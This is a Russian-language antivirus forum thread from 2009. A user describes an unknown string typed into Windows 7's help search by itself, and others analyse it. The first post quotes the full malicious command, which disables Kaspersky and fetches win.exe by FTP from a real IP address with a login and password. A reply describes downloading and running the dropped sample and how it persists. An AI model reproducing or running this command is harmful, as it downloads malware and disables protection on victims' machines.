Показано с 1 по 7 из 7.

про win.exe и как он попадает на машины.

  1. #1
    Junior Member Репутация
    Регистрация
    20.03.2008
    Сообщений
    3
    Вес репутации
    36

    про win.exe и как он попадает на машины.

    Сегодня наблюдал вот такую картину, установил windows7 [сборка 7229].
    Сижу ни кого не трогаю слушаю музыку через foobar. И тут система начинает сама выводить на передний план разные открытые окна, и так случилось что открылась служба спавки и поддержки, и в ней в строке поиска сама! без моего участия набралась строка
    net stop kavsvc &echo open 74.208.169.143 21 > il &echo user u52877190-d ddddddd >> il &echo binary >> il &echo get win.exe >> il &echo bye >> il &ftp -n -v -
    видимо она должна была отработать в командной строке.
    Одно успокоило "Каспера" на машине не использую. Вот такие дела...
    Кстати ip реально существует и на нем поднят ftp сервер.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    15.06.2008
    Сообщений
    482
    Вес репутации
    111
    Хм, думаю, что либо Win7 была с трояном, либо у Вас работал троян.
    Перешел на этот FTP. Ввел логин "u52877190-d" и пароль "ddddddd". Вроде правильные, но вылезло:


    Добавлено через 2 минуты

    Посоветовал бы выложить логи с этой машины.
    Если конечно, AVZ и HijackThis будут работать на Win7.

    Добавлено через 8 минут

    net stop kavsvc - команда "Выгрузить Касперского".

    Добавлено через 4 минуты

    Пока к серверу подключится не удалось...

    Добавлено через 1 минуту

    Используя ftp, пытаюсь подключится. Но не могу ввести пароль в окно консоли.

    Добавлено через 2 минуты

    Я попал на сервер! Там d.exe и win.exe

    Добавлено через 45 секунд

    d.exe = 84 Kb
    win.exe = 0 Kb (???)

    Добавлено через 5 минут

    После запуска d.exe появилась папка C:\Program Files\Common Files\System с файлом services.exe и:

    Спам-вирус?
    Отключаю Интернет на виртуальном ПК во избежание неприятностей
    services.exe прописался в HKLM Run как "Windows Update".

    Добавлено через 28 минут

    Блин, а папка System то системная Вот я ступил. Стер ее на виртуальном ПК несмотря на предостережение системы.
    Последний раз редактировалось bolshoy kot; 16.06.2009 в 00:07. Причина: Добавлено

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    09.10.2006
    Адрес
    Америка, Антигуа и Барбуда
    Сообщений
    1,212
    Вес репутации
    115

  5. #4
    Junior Member Репутация Репутация Репутация
    Регистрация
    01.10.2008
    Сообщений
    26
    Вес репутации
    36
    Как ни странно эти вредоносные файлы легко удаляются с этого фтп сервера

    Хотя конечно есть вероятность что они там скоро опять окажутся

  6. #5
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    15.06.2008
    Сообщений
    482
    Вес репутации
    111
    VirCode, такая мысль была, но не стал...

  7. #6
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Lexxus
    Регистрация
    27.10.2006
    Адрес
    г. Химки
    Сообщений
    494
    Вес репутации
    414
    и в ней в строке поиска сама! без моего участия набралась строка
    У тебя случаем RAdmin'а нет?)
    А вообще забавно, наверное, это лицезреть
    Очень похоже на действие Sasser, но что он забыл на Win7

    (Совсем параноидально: А может это сами Microsoft делают?)

  8. #7
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    09.10.2006
    Адрес
    Америка, Антигуа и Барбуда
    Сообщений
    1,212
    Вес репутации
    115
    Цитата Сообщение от Lexxus Посмотреть сообщение
    А может это сами Microsoft делают?
    Вот засланцы

Похожие темы

  1. Виртуальные Машины
    От Vneo в разделе Другие программы по безопасности
    Ответов: 9
    Последнее сообщение: 18.08.2010, 18:58
  2. Загрука машины.
    От Morgan152 в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 23.05.2010, 18:38
  3. Профилактика машины
    От devais в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 06.05.2009, 09:58
  4. логи уже с другой машины
    От Vialendil в разделе Помогите!
    Ответов: 7
    Последнее сообщение: 13.10.2008, 08:50
  5. уже с другой машины
    От user2008 в разделе Помогите!
    Ответов: 6
    Последнее сообщение: 23.09.2008, 13:06

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01064 seconds with 16 queries